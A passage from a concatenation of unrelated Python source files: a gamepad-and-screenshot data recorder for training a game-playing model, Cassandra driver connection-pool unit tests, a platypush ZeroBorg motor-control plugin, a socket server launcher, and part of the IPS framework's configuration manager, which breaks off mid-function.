0 self.JoystickY = 0 # self.A = 0 self.RightBumper = 0 self.C_left = 0 def dev_screen_shot(self): """ take a screenshot of the defined region on the screen """ sct_img = self.screen_capture.grab({ "top" : OFFSET_Y, "left" : OFFSET_X, "width" : SRC_W, "height": SRC_H }) # Create the Image return Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX') def screen_shot(self): """ take a screenshot of the defined region on the screen """ sct_img = self.screen_capture.grab({ "top" : OFFSET_Y, "left" : OFFSET_X, "width" : SRC_W, "height": SRC_H }) # return the resized numpy array represents the image im = np.array(Image.frombytes('RGB', sct_img.size, sct_img.bgra, 'raw', 'BGRX').getdata()) return resize(im, (IMG_H, IMG_W, IMG_D)) def dev_save_data(self): """ Save data into outputDir """ image_file = OUTPUTDIR + 'img_' + str(self.t) + '.png' self.img.save(image_file) # write csv line self.outfile.write( image_file + ',' + ','.join(map(str, self.controller_data)) + '\n' ) def save_data(self): """ Save data into outputDir """ print("\n==== SAVING TO FILE... ====") self.X = np.asarray(self.X) self.y = np.asarray(self.y) # directly save the data in numpy array format np.save("data/X_ep_{0}".format(self.num_episode), self.X) np.save("data/y_ep_{0}".format(self.num_episode), self.y) # keep the track of the number of episode self.num_episode += 1 # refresh the memory self.X = list() self.y = list() print("==== DONE ====") def read_data(self): """ Read data """ x = self.JoystickX y = self.JoystickY forward = self.A jump = self.RightBumper use_item = self.C_left if self.record_verbose: print(x, y, forward, jump, use_item) self._buffer_reset() return [x, y, forward, jump, use_item] def dev_main(self): """ Main loop """ self.img = self.dev_screen_shot() self.controller_data = self.read_data() self.dev_save_data() def main(self): """ Main loop with skiping frame """ # we store the data once in N(SKIP_FRAME) steps if self._t == SKIP_FRAME: self._image = np.max(np.stack(self._img), axis=0) self.controller_data = self.read_data() # store a numpy array of an image and y self.X.append(self._image) self.y.append(self.controller_data) self._t = 0 # put the image to the queue which has the length of 2 self._img.append(self.screen_shot()) self._t += 1 # ====== Utility functions ====== def record(bot): try: while True: bot.main() except KeyboardInterrupt: bot.save_data() def check_raw_input(): """ investigate the raw_input from the controller """ while True: events = get_gamepad() for event in events: print(event.code, event.state) # ====== Dev purpose functions ====== def dev_record(record_verbose): bot = Data_bot(record_verbose) while True: bot.dev_main() def dev_prepare(): X, y = list(), list() # load sample image_files = np.loadtxt(INPUT_DATA_CSV, delimiter=',', dtype=str, usecols=(0,)) joystick_values = np.loadtxt(INPUT_DATA_CSV, delimiter=',', usecols=(1,2,3,4,5)) # add joystick values to y y.append(joystick_values) # load, prepare and add images to X _t = 0 image = collections.deque(maxlen=2) for image_file in image_files: image = imread(image_file) _t += 1 if _t == SKIP_FRAME: # take maximum value of two successive frames image = np.max(np.stack(image), axis=0) im = resize(image, (IMG_H, IMG_W, IMG_D)) vec = im.reshape((IMG_H, IMG_W, IMG_D)) X.append(vec) _t = 0 print("==== SAVING TO FILE... ====") X = np.asarray(X) y = np.concatenate(y) # directly save the data in numpy array format np.save("data/X", X) np.save("data/y", y) print("==== DONE ====") def dev_check_data(): """ check the basic stats of the recorded data """ import pandas as pd df = pd.read_csv(INPUT_DATA_CSV) df.columns = ['path','x', 'y', 'f', 'j', 'u'] print(df.describe()) def dev_clean_up(num_episode): """ garbage collection function. Before moving on to the another episode, we remove the all files in `temp` """ # os.system("rm -rf temp") # os.system("mkdir temp") os.system("mv ./data/X.npy ./data/X_ep_{0}.npy".format(num_episode)) os.system("mv ./data/y.npy ./data/y_ep_{0}.npy".format(num_episode)) print("HOLD ON A SECOND") time.sleep(1) def aggregate(num_episodes): print("==== AGGREGATION: START ====") for i in range(num_episodes): if i == 0: X = np.load("data/X_ep_{0}.npy".format(i)) y = np.load("data/y_ep_{0}.npy".format(i)) else: temp_X = np.load("data/X_ep_{0}.npy".format(i)) temp_y = np.load("data/y_ep_{0}.npy".format(i)) np.concatenate((X, temp_X), axis=0) np.concatenate((y, temp_y), axis=0) os.system("rm ./data/X_*") os.system("rm ./data/y_*") np.save("data/X", X) np.save("data/y", y) print("==== AGGREGATION: DONE ====") if __name__ == '__main__': # refresh the directory os.system("rm ./data/*") # define args for this program parser = argparse.ArgumentParser() parser.add_argument("--experiment", help="Record the demo and store the outcome to `temp` directory") parser.add_argument("--controller_type", help="What kind of controller are you using? Choose : N64 or PS4") parser.add_argument("--num_episodes", help="how many times you would like to record?") parser.add_argument("--record_verbose", help="flag to specify if you would like to see the verbose of inputs") parser.add_argument("--check_raw_input", help="check the raw input from the current gamepad") args = parser.parse_args() if args.experiment == "0": for i in range(int(args.num_episodes)): try: print("""==== Episode: {0}/{1} ====\nTo start recording: PRESS Enter\nTo stop recording : PRESS Ctrl + c""".format(i+1, int(args.num_episodes))) _in = input() print("==== START RECORDING ====") dev_record(args.record_verbose) except KeyboardInterrupt: print("==== FINISH RECORDING ====") print("==== START PREPARING DATA ====") dev_prepare() dev_clean_up(i) aggregate(int(args.num_episodes)) elif args.experiment == "1": bot = Data_bot(record_verbose=args.record_verbose, controller_type=args.controller_type) for i in range(int(args.num_episodes)): try: print("""==== Episode: {0}/{1} ====\nTo start recording: PRESS Enter\nTo stop recording : PRESS Ctrl + c""".format(i+1, int(args.num_episodes))) _in = input() print("==== START RECORDING ====") record(bot) except KeyboardInterrupt: print("==== FINISH RECORDING ====") pass aggregate(int(args.num_episodes)) elif args.check_raw_input == "1": check_raw_input() else: print('hello')
test_host_connection_pool.py
# Copyright DataStax, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. try: import unittest2 as unittest except ImportError: import unittest # noqa from mock import Mock, NonCallableMagicMock from threading import Thread, Event, Lock from cassandra.cluster import Session from cassandra.connection import Connection from cassandra.pool import HostConnection, HostConnectionPool from cassandra.pool import Host, NoConnectionsAvailable from cassandra.policies import HostDistance, SimpleConvictionPolicy class _PoolTests(unittest.TestCase): PoolImpl = None uses_single_connection = None def make_session(self): session = NonCallableMagicMock(spec=Session, keyspace='foobarkeyspace') session.cluster.get_core_connections_per_host.return_value = 1 session.cluster.get_max_requests_per_connection.return_value = 1 session.cluster.get_max_connections_per_host.return_value = 1 return session def test_borrow_and_return(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) c, request_id = pool.borrow_connection(timeout=0.01) self.assertIs(c, conn) self.assertEqual(1, conn.in_flight) conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace') pool.return_connection(conn) self.assertEqual(0, conn.in_flight) if not self.uses_single_connection: self.assertNotIn(conn, pool._trash) def test_failed_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) conn.in_flight = conn.max_request_id # we're already at the max number of requests for this connection, # so we this should fail self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) def test_successful_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock()) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) def get_second_conn(): c, request_id = pool.borrow_connection(1.0) self.assertIs(conn, c) pool.return_connection(c) t = Thread(target=get_second_conn) t.start() pool.return_connection(conn) t.join() self.assertEqual(0, conn.in_flight) def test_spawn_when_at_max(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100) conn.max_request_id = 100 session.cluster.connection_factory.return_value = conn # core conns = 1, max conns = 2 session.cluster.get_max_connections_per_host.return_value = 2 pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) # make this conn full conn.in_flight = conn.max_request_id # we don't care about making this borrow_connection call succeed for the # purposes of this test, as long as it results in a new connection # creation being scheduled self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) if not self.uses_single_connection: session.submit.assert_called_once_with(pool._create_new_connection) def test_return_defunct_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, signaled_error=False) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) conn.is_defunct = True session.cluster.signal_connection_failure.return_value = False pool.return_connection(conn) # the connection should be closed a new creation scheduled self.assertTrue(session.submit.call_args) self.assertFalse(pool.is_shutdown) def test_return_defunct_connection_on_down_host(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, signaled_error=False) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) conn.is_defunct = True session.cluster.signal_connection_failure.return_value = True pool.return_connection(conn) # the connection should be closed a new creation scheduled self.assertTrue(session.cluster.signal_connection_failure.call_args) self.assertTrue(conn.close.call_args) self.assertFalse(session.submit.called) self.assertTrue(pool.is_shutdown) def test_return_closed_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=True, max_request_id=100, signaled_error=False) session.cluster.connection_factory.return_value = conn pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.endpoint) pool.borrow_connection(timeout=0.01) conn.is_closed = True session.cluster.signal_connection_failure.return_value = False pool.return_connection(conn) # a new creation should be scheduled self.assertTrue(session.submit.call_args) self.assertFalse(pool.is_shutdown) def test_host_instantiations(self): """ Ensure Host fails if not initialized properly """ self.assertRaises(ValueError, Host, None, None) self.assertRaises(ValueError, Host, '127.0.0.1', None) self.assertRaises(ValueError, Host, None, SimpleConvictionPolicy) def test_host_equality(self): """ Test host equality has correct logic """ a = Host('127.0.0.1', SimpleConvictionPolicy) b = Host('127.0.0.1', SimpleConvictionPolicy) c = Host('127.0.0.2', SimpleConvictionPolicy) self.assertEqual(a, b, 'Two Host instances should be equal when sharing.') self.assertNotEqual(a, c, 'Two Host instances should NOT be equal when using two different addresses.') self.assertNotEqual(b, c, 'Two Host instances should NOT be equal when using two different addresses.') class HostConnectionPoolTests(_PoolTests): PoolImpl = HostConnectionPool uses_single_connection = False def test_all_connections_trashed(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False, max_request_id=100, lock=Lock()) session.cluster.connection_factory.return_value = conn session.cluster.get_core_connections_per_host.return_value = 1 # manipulate the core connection setting so that we can # trash the only connection pool = self.PoolImpl(host, HostDistance.LOCAL, session) session.cluster.get_core_connections_per_host.return_value = 0 pool._maybe_trash_connection(conn) session.cluster.get_core_connections_per_host.return_value = 1 submit_called = Event() def fire_event(*args, **kwargs): submit_called.set() session.submit.side_effect = fire_event def get_conn(): conn.reset_mock() c, request_id = pool.borrow_connection(1.0) self.assertIs(conn, c) self.assertEqual(1, conn.in_flight) conn.set_keyspace_blocking.assert_called_once_with('foobarkeyspace') pool.return_connection(c) t = Thread(target=get_conn) t.start() submit_called.wait() self.assertEqual(1, pool._scheduled_for_creation) session.submit.assert_called_once_with(pool._create_new_connection) # now run the create_new_connection call pool._create_new_connection() t.join() self.assertEqual(0, conn.in_flight) class HostConnectionTests(_PoolTests): PoolImpl = HostConnection uses_single_connection = True
__init__.py
import enum import logging import threading import time from platypush.message.response import Response from platypush.plugins import Plugin from platypush.context import get_plugin from platypush.config import Config class Direction(enum.Enum): DIR_UP = 'up' DIR_DOWN = 'down' DIR_LEFT = 'left' DIR_RIGHT = 'right' DIR_AUTO = 'auto' DIR_AUTO_TOGGLE = 'auto_toggle' class GpioZeroborgPlugin(Plugin): _drive_thread = None _can_run = False _direction = None def __init__(self, directions = {}): import platypush.plugins.gpio.zeroborg.lib as ZeroBorg self.directions = directions self.auto_mode = False self._direction = None self.zb = ZeroBorg.ZeroBorg() self.zb.Init() self.zb.SetCommsFailsafe(True) self.zb.ResetEpo() def _get_measurement(self, plugin, timeout): measure_start_time = time.time() value = None while value is None: value = plugin.get_measurement() if time.time() - measure_start_time > timeout: return None return value def _get_direction_from_sensors(self): if Direction.DIR_AUTO.value not in self.directions: raise RuntimeError("Can't start auto pilot: " + "no sensor configured in gpio.zeroborg.directions.auto") direction = None for sensor in self.directions[Direction.DIR_AUTO.value]['sensors']: plugin = get_plugin(sensor['plugin']) if not sensor: raise RuntimeError('No such sensor: ' + sensor['plugin']) value = self._get_measurement(plugin=plugin, timeout=sensor['timeout']) threshold = sensor['threshold'] if value >= threshold and 'above_threshold_direction' in sensor: direction = sensor['above_threshold_direction'] elif 'below_threshold_direction' in sensor: direction = sensor['below_threshold_direction'] logging.info('Sensor: {}\tMeasurement: {}\tDirection: {}' .format(sensor['plugin'], value, direction)) return direction def drive(self, direction): prev_direction = self._direction self._can_run = True self._direction = direction.lower() logging.info('Received ZeroBorg drive command: {}'.format(direction)) def _run(): while self._can_run and self._direction: left = 0.0 right = 0.0 if self._direction == Direction.DIR_AUTO_TOGGLE.value: if self.auto_mode: self._direction = None self.auto_mode = False else: self._direction = Direction.DIR_AUTO self.auto_mode = True if self._direction == Direction.DIR_AUTO.value: self.auto_mode = True if self.auto_mode: self._direction = self._get_direction_from_sensors() time.sleep(0.1) motor_1_power = motor_2_power = motor_3_power = motor_4_power = 0.0 if self._direction in self.directions: motor_1_power = self.directions[self._direction]['motor_1_power'] motor_2_power = self.directions[self._direction]['motor_2_power'] motor_3_power = self.directions[self._direction]['motor_3_power'] motor_4_power = self.directions[self._direction]['motor_4_power'] elif self._direction: logging.warning('Invalid direction {}, stopping motors'.format(self._direction)) self.zb.SetMotor1(motor_1_power) self.zb.SetMotor2(motor_2_power) self.zb.SetMotor3(motor_3_power) self.zb.SetMotor4(motor_4_power) self.auto_mode = False self._drive_thread = threading.Thread(target=_run) self._drive_thread.start() return Response(output={'status': 'running', 'direction': direction}) def stop(self): self._can_run = False if self._drive_thread and threading.get_ident() != self._drive_thread.ident: self._drive_thread.join() self.zb.MotorsOff() self.zb.ResetEpo() return Response(output={'status':'stopped'}) # vim:sw=4:ts=4:et:
main.py
import multiprocessing from db import DbBridge from comunications import SocketServer, WebsocketServer if __name__ == "__main__": db = DbBridge() db.initDB() connectionsClients = {} socket = SocketServer(connectionsClients) websocket = WebsocketServer(connectionsClients) try: # creating processes socketProcess = multiprocessing.Process(target=socket.run, args=()) websocketProcess = multiprocessing.Process( target=websocket.run, args=()) db.close() # starting process 1 socketProcess.start() # starting process 2 websocketProcess.start() # wait until process 1 is finished socketProcess.join() # wait until process 2 is finished websocketProcess.join() except KeyboardInterrupt: socket.stop()
configurationManager.py
# ------------------------------------------------------------------------------- # Copyright 2006-2021 UT-Battelle, LLC. See LICENSE for more information. # ------------------------------------------------------------------------------- import os import sys import importlib import importlib.util import tempfile import uuid import logging import socket from multiprocessing import Queue, Process, set_start_method from .configobj import ConfigObj from . import ipsLogging from .services import ServicesProxy from .componentRegistry import ComponentID, ComponentRegistry # Try using fork for starting subprocesses, this is the default on # Linux but not macOS with python >= 3.8 if sys.platform == 'darwin': try: set_start_method('fork') except RuntimeError: # context can only be set once pass class ConfigurationManager: """ The configuration manager is responsible for paring the simulation and platform configuration files, creating the framework and simulation components, as well as providing an interface to accessing items from the configuration files (e.g., the time loop). """ # CM init class SimulationData: """ Structure to hold simulation data stored into the sim_map entry in the configurationManager class """ def __init__(self, sim_name): self.sim_name = sim_name self.portal_sim_name = None self.sim_root = None self.sim_conf = None self.config_file = None self.conf_file_dir = None self.driver_comp = None self.init_comp = None self.all_comps = [] self.port_map = {} self.component_process = None self.process_list = [] def __init__(self, fwk, config_file_list, platform_file_name): """ Initialize the values to be used by the configuration manager. Also specified are the required fields of the simulation configuration file, and the configuration files are read in. """ # ref to framework self.fwk = fwk self.event_mgr = None self.data_mgr = None self.resource_mgr = None self.task_mgr = None self.comp_registry = ComponentRegistry() # SIMYAN: here is where we removed the requirement for BIN_PATH, etc. # from the required fields. This was done so that we could specify it # in the component-generic.conf file, which allows you to point to a # directory that contains physics and other binaries on a global level # i.e. removing the requirement that it be specified for each component self.required_fields = set(['CLASS', 'SUB_CLASS', 'NAME', 'SCRIPT', 'INPUT_FILES', 'OUTPUT_FILES', 'NPROC']) self.config_file_list = [] self.sim_name_list = None self.sim_root_list = None self.log_file_list = None self.log_dynamic_sim_queue = Queue(0) class Unbuffered: def __init__(self, stream): self.stream = stream def write(self, data): self.stream.write(data) self.stream.flush() def writelines(self, data): self.stream.writelines(data) self.stream.flush() def __getattr__(self, attr): return getattr(self.stream, attr) for conf_file in config_file_list: abs_path = os.path.abspath(conf_file) if abs_path not in self.config_file_list: self.config_file_list.append(abs_path) else: print('Ignoring duplicate configuration file ', abs_path) # sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) sys.stdout = Unbuffered(sys.stdout) self.platform_file = os.path.abspath(platform_file_name) self.platform_conf = {} loc_keys = [] mach_keys = ['MPIRUN', 'NODE_DETECTION', 'CORES_PER_NODE', 'SOCKETS_PER_NODE', 'NODE_ALLOCATION_MODE'] prov_keys = ['HOST'] self.platform_keywords = loc_keys + mach_keys + prov_keys self.service_methods = ['get_port', 'get_config_parameter', 'set_config_parameter', 'get_time_loop', 'create_simulation'] self.fwk.register_service_handler(self.service_methods, getattr(self, 'process_service_request')) self.sim_map = {} self.finished_sim_map = {} self.fwk_sim_name = None # "Fake" simconf for framework components self.fwk_components = [] # List of framework specific components self.myTopic = None self.log_daemon = ipsLogging.ipsLogger(self.log_dynamic_sim_queue) self.log_process = None # CM initialize def initialize(self, data_mgr, resource_mgr, task_mgr): """ Parse the platform and simulation configuration files using the :py:obj:`ConfigObj` module. Create and initialize simulation(s) and their components, framework components and loggers. """ self.event_mgr = None # eventManager(self) self.data_mgr = data_mgr self.resource_mgr = resource_mgr self.task_mgr = task_mgr # Parse configuration files into configuration map sim_root_list = self.sim_root_list = [] sim_name_list = self.sim_name_list = [] log_file_list = self.log_file_list = [] # Idiot checks if len(self.config_file_list) == 0: self.fwk.exception('Missing config file? Something is very wrong') raise ValueError('Missing config file? Something is very wrong') """ Platform Configuration """ # parse file try: self.platform_conf = ConfigObj(self.platform_file, interpolation='template', file_error=True) except (IOError, SyntaxError): self.fwk.exception('Error opening config file: %s', self.platform_file) raise # get mandatory values for kw in self.platform_keywords: try: self.platform_conf[kw] except KeyError: self.fwk.exception('Missing required parameter %s in platform config file', kw) raise # Make sure the HOST variable is defined try: host = self.platform_conf['HOST'] except KeyError: self.platform_conf['HOST'] = socket.gethostname() else: if not host: self.platform_conf['HOST'] = socket.gethostname() """ optional platform values are obtained and read here """ user = '' try: user = self.platform_conf['USER'] except KeyError: try: user = os.environ['USER'] except Exception: pass self.platform_conf['USER'] = user # Grab environment variables plat_keys = list(self.platform_conf.keys()) for (k, v) in os.environ.items(): if k not in plat_keys \ and not any(x in v for x in '{}()$'): self.platform_conf[k] = v mpirun_version = self.platform_conf.get('MPIRUN_VERSION', 'OpenMPI-generic') # node allocation mode describes how node allocation should be handled # in the IPS. # EXCLUSIVE - only one application can run on a single node. # SHARE - applications may share nodes. try: node_alloc_mode = self.platform_conf['NODE_ALLOCATION_MODE'].upper() if node_alloc_mode not in ['EXCLUSIVE', 'SHARED']: self.fwk.exception("bad value for NODE_ALLOCATION_MODE. expected 'EXCLUSIVE' or 'SHARED'.") raise ValueError("bad value for NODE_ALLOCATION_MODE. expected 'EXCLUSIVE' or 'SHARED'.") except Exception: self.fwk.exception("missing value or bad type for NODE_ALLOCATION_MODE. expected 'EXCLUSIVE' or 'SHARED'.") raise uan_val = self.platform_conf.get('USE_ACCURATE_NODES', 'ON').upper() if uan_val in ['OFF', 'FALSE']: use_accurate_nodes = False else: use_accurate_nodes = True self.platform_conf['TOTAL_PROCS'] = int(self.platform_conf.get('TOTAL_PROCS', 0)) self.platform_conf['NODES'] = int(self.platform_conf.get('NODES', 0)) self.platform_conf['PROCS_PER_NODE'] = int(self.platform_conf.get('PROCS_PER_NODE', 0)) self.platform_conf['CORES_PER_NODE'] = int(self.platform_conf.get('CORES_PER_NODE', 0)) self.platform_conf['SOCKETS_PER_NODE'] = int(self.platform_conf.get('SOCKETS_PER_NODE', 0)) self.platform_conf['USE_ACCURATE_NODES'] = use_accurate_nodes self.platform_conf['MPIRUN_VERSION'] = mpirun_version """ Simulation Configuration """ for conf_file in self.config_file_list: try: conf = ConfigObj(conf_file, interpolation='template', file_error=True) # Import environment variables into config file # giving precedence to config file definitions in case of duplicates conf_keys = list(conf.keys()) for (k, v) in os.environ.items(): if k not in conf_keys and not any(x in v for x in '{}()$'): conf[k] = v # Allow simulation file to override platform values # and then put all platform values into simulation map for key in self.platform_conf: if key in conf_keys and key not in os.environ.keys(): self.platform_conf[key] = conf[key] if key not in conf_keys: conf[key] = self.platform_conf[key] # Override platform value for PORTAL_URL if in simulation if 'PORTAL_URL' in conf_keys: self.platform_conf['PORTAL_URL'] = conf['PORTAL_URL'] except (IOError, SyntaxError): self.fwk.exception('Error opening config file %s: ', conf_file) raise except Exception: self.fwk.exception('Error(s) during parsing of supplied config file %s: ', conf_file) raise try: sim_name = conf['SIM_NAME'] sim_root = conf['SIM_ROOT'] log_file = os.path.abspath(conf['LOG_FILE']) except KeyError: self.fwk.exception('Missing required parameters SIM_NAME, SIM_ROOT or LOG_FILE\ in configuration file %s', conf_file) raise if sim_name in sim_name_list: self.fwk.exception('Error: Duplicate SIM_NAME in configuration files') sys.exit(1) if sim_root in sim_root_list: self.fwk.exception('Error: Duplicate SIM_ROOT in configuration files') sys.exit(1) if log_file in log_file_list: self.fwk.exception('Error: Duplicate LOG_FILE in configuration files') sys.exit(1) if 'SIMULATION_CONFIG_FILE' not in conf: conf['SIMULATION_CONFIG_FILE'] = conf_file sim_name_list.append(sim_name) sim_root_list.append(sim_root) log_file_list.append(log_file) new_sim = self.SimulationData(sim_name) conf['__PORTAL_SIM_NAME'] = sim_name new_sim.sim_conf = conf new_sim.config_file = conf_file new_sim.portal_sim_name = sim_name # SIMYAN: store the directory of the configuration file new_sim.conf_file_dir = os.path.dirname(os.path.abspath(conf_file)) new_sim.sim_root = sim_root new_sim.log_file = log_file new_sim.log_pipe_name = f'{tempfile.gettempdir()}/ips_{uuid.uuid4()}.logpipe' self.log_daemon.add_sim_log(new_sim.log_pipe_name, new_sim.log_file) self.sim_map[sim_name] = new_sim # Use first simulation for framework components if not self.fwk_sim_name: fwk_sim_conf = conf.dict() fwk_sim_conf['SIM_NAME'] = '_'.join([conf['SIM_NAME'], 'FWK']) fwk_sim = self.SimulationData(fwk_sim_conf['SIM_NAME']) fwk_sim.sim_conf = fwk_sim_conf fwk_sim.sim_root = new_sim.sim_root fwk_sim.log_file = self.fwk.log_file # sys.stdout fwk_sim.log_pipe_name = f'{tempfile.gettempdir()}/ips_{uuid.uuid4()}.logpipe' fwk_sim_conf['LOG_LEVEL'] = 'DEBUG' self.log_daemon.add_sim_log(fwk_sim.log_pipe_name, fwk_sim.log_file) self.fwk_sim_name = fwk_sim_conf['SIM_NAME'] self.sim_map[fwk_sim.sim_name] = fwk_sim self.log_process = Process(target=self.log_daemon.__run__) self.log_process.start() for sim_name, sim_data in self.sim_map.items(): if sim_name != self.fwk_sim_name: self._initialize_sim(sim_data) # ***** commenting out portal stuff for now self._initialize_fwk_components() # do later - subscribe to events, set up event publishing structure # publish "CM initialized" event def _initialize_fwk_components(self): """ Initialize 'components' that are part of the framework infrastructure. Those components (for now) communicate using the event bus and are not part of the normal framework-mediated RPC inter-compponent interactions """ # SIMYAN: set up the runspaceInit component runspace_conf = {} runspace_conf['CLASS'] = 'FWK' runspace_conf['SUB_CLASS'] = 'COMP' runspace_conf['NAME'] = 'runspaceInitComponent' runspace_conf['SCRIPT'] = '' runspace_conf['MODULE'] = 'ipsframework.runspaceInitComponent' runspace_conf['INPUT_DIR'] = '/dev/null' runspace_conf['INPUT_FILES'] = '' runspace_conf['IPS_CONFFILE_DIR'] = '' runspace_conf['DATA_FILES'] = '' runspace_conf['OUTPUT_FILES'] = '' runspace_conf['NPROC'] = 1 runspace_conf['LOG_LEVEL'] = 'WARNING' runspace_conf['OS_CWD'] = os.getcwd() if self.fwk.log_level == logging.DEBUG: runspace_conf['LOG_LEVEL'] = 'DEBUG' runspace_component_id = self._create_component(runspace_conf, self.sim_map[self.fwk_sim_name]) self.fwk_components.append(runspace_component_id) # SIMYAN: set up The Portal bridge, allowing for an absence of a portal use_portal = True if 'USE_PORTAL' in self.sim_map[self.fwk_sim_name].sim_conf: use_portal = self.sim_map[self.fwk_sim_name].sim_conf['USE_PORTAL'] if use_portal.lower() == "false": use_portal = False if use_portal: portal_conf = {} portal_conf['CLASS'] = 'FWK' portal_conf['SUB_CLASS'] = 'COMP' portal_conf['NAME'] = 'PortalBridge' if 'FWK_COMPS_PATH' in self.sim_map[self.fwk_sim_name].sim_conf: portal_conf['BIN_PATH'] = self.sim_map[self.fwk_sim_name].sim_conf['FWK_COMPS_PATH'] portal_conf['SCRIPT'] = os.path.join(portal_conf['BIN_PATH'], 'portalBridge.py') else: portal_conf['SCRIPT'] = '' portal_conf['MODULE'] = 'ipsframework.portalBridge' portal_conf['INPUT_DIR'] = '/dev/null' portal_conf['INPUT_FILES'] = '' portal_conf['DATA_FILES'] = '' portal_conf['OUTPUT_FILES'] = '' portal_conf['NPROC'] = 1 portal_conf['LOG_LEVEL'] = 'WARNING' try: portal_conf['USER'] = self.sim_map[self.fwk_sim_name].sim_conf['USER'] except KeyError: portal_conf['USER'] = self.platform_conf['USER'] if self.fwk.log_level == logging.DEBUG: portal_conf['LOG_LEVEL'] = 'DEBUG' portal_conf['PORTAL_URL'] = self.get_platform_parameter('PORTAL_URL', silent=True) component_id = self._create_component(portal_conf, self.sim_map[self.fwk_sim_name]) self.fwk_components.append(component_id) def _initialize_sim(self, sim_data): """ Parses the configuration data (*sim_conf*) associated with a simulation (*sim_name*). Instantiate the components associated with each simulation. Populate the *component_registry* with appropriate component and port mapping info. """ sim_conf = sim_data.sim_conf sim_name = sim_data.sim_name ports_config = sim_conf['PORTS'] ports_list = ports_config['NAMES'].split() # simRootDir = self.get_sim_parameter(sim_name, 'SIM_ROOT') # SIMYAN: removed code that would make the simrootDir from here and # moved it to the runspaceInit component # set simulation level partial_nodes try: pn_simconf = sim_conf['NODE_ALLOCATION_MODE'] if pn_simconf.upper() == 'SHARED': sim_data.sim_conf['NODE_ALLOCATION_MODE'] = 'SHARED' elif pn_simconf.upper() == 'EXCLUSIVE': sim_data.sim_conf['NODE_ALLOCATION_MODE'] = 'EXCLUSIVE' else: self.fwk.exception("Bad 'NODE_ALLOCATION_MODE' value %s" % pn_simconf) raise Exception("Bad 'NODE_ALLOCATION_MODE' value %s" % pn_simconf) except Exception: sim_data.sim_conf['NODE_ALLOCATION_MODE'] = self.platform_conf['NODE_ALLOCATION_MODE'] for port in ports_list: try: comp_ref = ports_config[port]['IMPLEMENTATION'] if comp_ref.strip() == '': continue comp_conf = sim_conf[comp_ref] except Exception: self.fwk.exception('Error accessing configuration section for ' + 'component %s in simulation %s', comp_ref, sim_name) sys.exit(1) conf_fields = set(comp_conf.keys()) # Move the paths to the component levels so that they can use it # If they already have it, then they are effectively overriding the global values if 'INPUT_DIR' not in comp_conf: if 'INPUT_DIR' in sim_conf: comp_conf['INPUT_DIR'] = sim_conf['INPUT_DIR'] else: comp_conf['INPUT_DIR'] = sim_data.conf_file_dir if 'IPS_ROOT' not in comp_conf: if 'IPS_ROOT' in sim_conf: comp_conf['IPS_ROOT'] = sim_conf['IPS_ROOT'] if 'DATA_TREE_ROOT' not in comp_conf: if 'DATA_TREE_ROOT' in sim_conf: comp_conf['DATA_TREE_ROOT'] = sim_conf['DATA_TREE_ROOT'] else: comp_conf['DATA_TREE_ROOT'] = sim_data.conf_file_dir if 'BIN_DIR' not in comp_conf: if 'BIN_DIR' in sim_conf: comp_conf['BIN_DIR'] = sim_conf['BIN_DIR'] if 'BIN_PATH' not in comp_conf: if 'BIN_PATH' in sim_conf: comp_conf['BIN_PATH'] = sim_conf['BIN_PATH'] else: comp_conf['BIN_PATH'] = comp_conf['BIN_DIR'] if not self.required_fields.issubset(conf_fields): msg = 'Error: missing required entries {} in simulation {} component {} configuration section'.format( list(self.required_fields - conf_fields), sim_name, comp_ref) self.fwk.critical(msg) raise RuntimeError(msg) component_id = self._create_component(comp_conf, sim_data) sim_data.port_map[port] = component_id if port == 'DRIVER': sim_data.driver_comp = component_id elif port == 'INIT': 